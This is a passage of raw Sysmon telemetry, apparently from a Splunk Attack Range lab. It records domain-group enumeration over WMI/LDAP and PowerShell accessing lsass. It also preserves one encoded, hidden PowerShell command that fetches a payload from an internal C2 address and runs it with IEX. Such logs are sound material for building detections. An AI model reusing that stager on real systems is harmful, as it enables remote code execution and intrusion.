Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.847{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.847{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.831{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=EC78D6F150B9D41116DE7C837122C5F2,SHA256=701FF056C0B5F465F646B659D614FD8C88B0854379A4C0D8C83303246BD8D829,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 17141700x800000000000000035128960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-09 22:00:38.828{B81B27B7-8406-613A-ED96-03000000C801}2844\PSHost.132756984387475720.2844.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035128959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.816{B81B27B7-8406-613A-ED96-03000000C801}2844ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_zvhgma4q.sv1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.816{B81B27B7-8406-613A-ED96-03000000C801}2844ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_5ijxmo4p.5hh.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035128957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.802{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_5ijxmo4p.5hh.ps12021-09-09 22:00:38.802 23542300x800000000000000035128956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.790{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.784{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.750{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.748{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.748{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.748{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.747{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.747{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.747{B81B27B7-8406-613A-EC96-03000000C801}50203728C:\Windows\system32\cmd.exe{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.747{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe get-wmiobject -class ds_group -namespace root\directory\ldapC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-8406-613A-EC96-03000000C801}5020C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe get-wmiobject -class ds_group -namespace root\directory\ldap 10341000x800000000000000035128946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.743{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8406-613A-EC96-03000000C801}5020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.740{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.740{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.740{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.740{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.740{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-8406-613A-EC96-03000000C801}5020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.739{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-8406-613A-EC96-03000000C801}5020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035128939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.739{B81B27B7-8406-613A-EC96-03000000C801}5020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe get-wmiobject -class ds_group -namespace root\directory\ldapC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035128938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E01B4D5D2375A55D79F92220FC2AA67,SHA256=8412A35A1D184D3E6CF7C71A0D142B752E70678E6CC158F26685D30A87CD8FB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:04.901{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62224-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.745{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F1444E1851E9169775621564D2BF38E,SHA256=4A37671FB106A691084E883A2DBBFAC7568A13DBE35486355435E4D2907F3771,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.745{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC52F428936E67F824B71B1D6975CB77,SHA256=7B8DFC2590C958C5C24C80BA8C6DEC4368BBBBD33D78FAE75CAABE97EA865D2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.730{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 